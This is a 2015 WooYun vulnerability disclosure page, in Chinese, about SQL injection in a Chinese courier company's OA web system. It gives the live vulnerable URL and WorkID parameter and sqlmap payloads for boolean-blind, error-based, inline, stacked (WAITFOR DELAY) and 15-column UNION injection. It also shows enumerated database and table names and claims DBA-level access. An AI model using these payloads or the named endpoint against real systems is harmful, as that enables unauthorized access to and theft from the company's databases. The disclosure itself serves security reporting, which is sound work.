当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151617

漏洞标题:优速快递某站SQL注射漏洞(DBA权限/可union)

相关厂商:优速快递

漏洞作者: 路人甲

提交时间:2015-11-04 17:40

修复时间:2015-12-19 17:42

公开时间:2015-12-19 17:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

优速物流是一家提供国内快递、快运、报关﹑报检、代收款、高价值等服务的专业快递公司。

详细说明:

注入点:WorkID

http://oa.uc56.com/UCOA/WF/WorkOpt/OneWork/CH.aspx?FK_Node=%27&WorkID=51858&FK_Flow=129


Parameter: WorkID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: FK_Node=7&WorkID=51858 AND 5295=5295&FK_Flow=129
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: FK_Node=7&WorkID=51858 AND 9785=CONVERT(INT,(SELECT CHAR(113)+CHAR(
113)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (9785=9785) THEN CHAR(49)
ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)))&FK_Flow=
129
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: FK_Node=7&WorkID=(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113)+CH
AR(113)+(SELECT (CASE WHEN (6955=6955) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(11
3)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113))&FK_Flow=129
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: FK_Node=7&WorkID=51858;WAITFOR DELAY '0:0:5'--&FK_Flow=129
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: FK_Node=7&WorkID=51858 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(113)+CH
AR(76)+CHAR(121)+CHAR(110)+CHAR(66)+CHAR(99)+CHAR(108)+CHAR(77)+CHAR(88)+CHAR(86
)+CHAR(102)+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113),NULL,NULL,NULL-- &
FK_Flow=129
---


所有库:

available databases [8]:
[*] Android_db
[*] ccflow
[*] ccflowdemo
[*] master
[*] model
[*] msdb
[*] tempdb
[*] ucsoa


ccflow库的表:

SELECT name from SysObjects where type='U' and name not like 'ND%' [1
[*] CN_Area
[*] CN_City
[*] CN_PQ
[*] CN_Product
[*] CN_SF
[*] HungUpWork
[*] InformWork
[*] Items_detail
[*] Port_Unit
[*] Pub_DayScop
[*] Pub_ND
[*] Pub_NY
[*] Pub_YF
[*] SF_AmountClassfiy
[*] SF_Bank
[*] SF_SQLC
[*] SF_TxfClassfiy
[*] SF_ZCSQLX
[*] sqlmapoutput
[*] Sys_AccessToken
[*] Sys_CField
[*] Sys_Contrast
[*] Sys_DBSimpleNoName
[*] Sys_DefVal
[*] Sys_DocFile
[*] Sys_EnCfg
[*] Sys_EnsAppCfg
[*] Sys_EnsRef
[*] Sys_EnumMain
[*] Sys_FileManager
[*] Sys_FileType
[*] Sys_FrmAttachmentDB
[*] Sys_FrmBtn
[*] Sys_FrmEleDB
[*] Sys_FrmEvent
[*] Sys_FrmImgAth
[*] Sys_FrmLab
[*] Sys_FrmLine
[*] Sys_FrmLink
[*] Sys_FrmRB
[*] Sys_FrmSort
[*] Sys_GloVar
[*] Sys_GroupEnsTemplate
[*] Sys_GroupField
[*] Sys_M2M
[*] Sys_MapAttr
[*] Sys_MapData
[*] Sys_MapDtl
[*] Sys_MapExt
[*] Sys_MapFrame
[*] Sys_MapM2M
[*] Sys_RptRefLink
[*] Sys_RptTemplate
[*] Sys_Serial
[*] Sys_SFTable
[*] Sys_UserRegedit
[*] TA_MailDtl
[*] TA_SMS
[*] UC01
[*] UC_BX
[*] UC_GCLX
[*] UC_Lease_fk
[*] UC_Procurement
[*] UC_Project
[*] UC_UpdateLeave
[*] UCBX_MX
[*] V_FlowData1
[*] V_WF_Data
[*] WF_Bill
[*] WF_BillTemplate
[*] WF_BillType
[*] WF_CCDept
[*] WF_CCEmp
[*] WF_CCList
[*] WF_CCStation
[*] WF_CHOfFlow
[*] WF_CHOfNode
[*] WF_Cond
[*] WF_DataApply
[*] WF_DeptFlowSearch
[*] WF_Direction
[*] WF_Emp
[*] WF_FAppSet
[*] WF_FileManager
[*] WF_FlowEmp
[*] WF_FlowNode
[*] WF_FlowSort
[*] WF_ForwardWork
[*] WF_FrmNode
[*] WF_GenerFH
[*] WF_GenerWorkerlist
[*] WF_GenerWorkFlow
[*] WF_LabNote
[*] WF_Listen
[*] WF_NodeDept
[*] WF_NodeEmp
[*] WF_NodeFlow
[*] WF_NodeReturn
[*] WF_NodeStation
[*] WF_RememberMe
[*] WF_ReturnWork
[*] WF_SelectAccper
[*] WF_Task
[*] WF_Track
[*] WF_TurnTo

漏洞证明:

dba权限:

1.jpg

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝